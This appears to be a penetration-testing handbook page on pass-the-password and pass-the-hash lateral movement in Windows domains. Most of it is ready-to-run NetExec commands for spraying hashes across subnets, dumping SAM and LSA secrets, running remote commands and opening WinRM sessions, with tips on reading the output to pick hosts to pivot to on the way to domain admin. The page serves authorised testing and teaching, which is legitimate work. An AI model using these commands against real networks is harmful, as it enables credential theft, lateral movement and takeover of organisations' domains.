Handbook

Pass the Password/Hash

Updated 29 Sept 2026Services✎ Suggest a change
On this page

Attack Flow

plain text
Obtain hash or password (SAM dump / Responder / cracking)
→ Pass across subnet — nxc smb <subnet>/24
→ Review for Pwn3d! (admin access)
→ Dump SAM/LSA on Pwn3d! hosts
→ Pass new hashes across subnet — repeat
→ Continue until DA hash or DA access obtained

What Can Be Dumped

TargetLocationValue
SAMC:\Windows\System32\config\SAMLocal account NTLM hashes — local admin often reused domain-wide
LSA SecretsHKLM\SECURITY\Policy\SecretsCached domain creds, service account passwords
NTDS.ditC:\Windows\NTDS\NTDS.dit on DCEvery domain account hash (see DCSync section)
LSASSIn-memory processActive session creds — NTLM, Kerberos tickets, sometimes plaintext

Using a Password

bash
nxc smb <ip/cidr> -u <username> -p <password> -d <domain.local>

nxc smb <target-ip> -u <username> -p <password> -d <domain.local>

Pass the Hash

bash
# Local account hash (e.g. local Administrator from SAM dump)
nxc smb <ip/cidr> -u <username> -H <hash> --local-auth

# Domain account hash
nxc smb <ip/cidr> -u <username> -H <hash> -d <domain.local>

Dump SAM (requires admin / Pwn3d!)

bash
nxc smb <ip/cidr> -u <username> -H <hash> --local-auth --sam

nxc smb <target-ip> -u <username> -H <hash> --local-auth --sam

Dump LSA Secrets (requires admin / Pwn3d!)

bash
nxc smb <ip/cidr> -u <username> -H <hash> --local-auth --lsa

nxc smb <target-ip> -u <username> -H <hash> --local-auth --lsa

Enumerate Shares

bash
nxc smb <ip/cidr> -u <username> -H <hash> --local-auth --shares

nxc smb <ip/cidr> -u <username> -p <password> -d <domain.local> --shares

Execute Commands (requires admin / Pwn3d!)

bash
nxc smb <ip/cidr> -u <username> -H <hash> --local-auth -x "whoami"

nxc smb <ip/cidr> -u <username> -H <hash> --local-auth -X "Get-LocalGroupMember Administrators"

WinRM

bash
nxc winrm <ip/cidr> -u <username> -H <hash>

nxc winrm <ip/cidr> -u <username> -p <password> -d <domain.local>

Reading nxc Output

plain text
SMB  192.168.1.100  445  WORKSTATION01  [+] DOMAIN\username (Pwn3d!)   ← local admin, pivot here
SMB  192.168.1.101  445  WORKSTATION02  [+] DOMAIN\username            ← valid creds, no admin
SMB  192.168.1.102  445  WORKSTATION03  [-] DOMAIN\username            ← auth failed
OutputMeaning
[+] with Pwn3d!Local admin — pivot here
[+] without Pwn3d!Valid creds, no admin
[-]Auth failed

NXC Database

bash
nxc db
nxc creds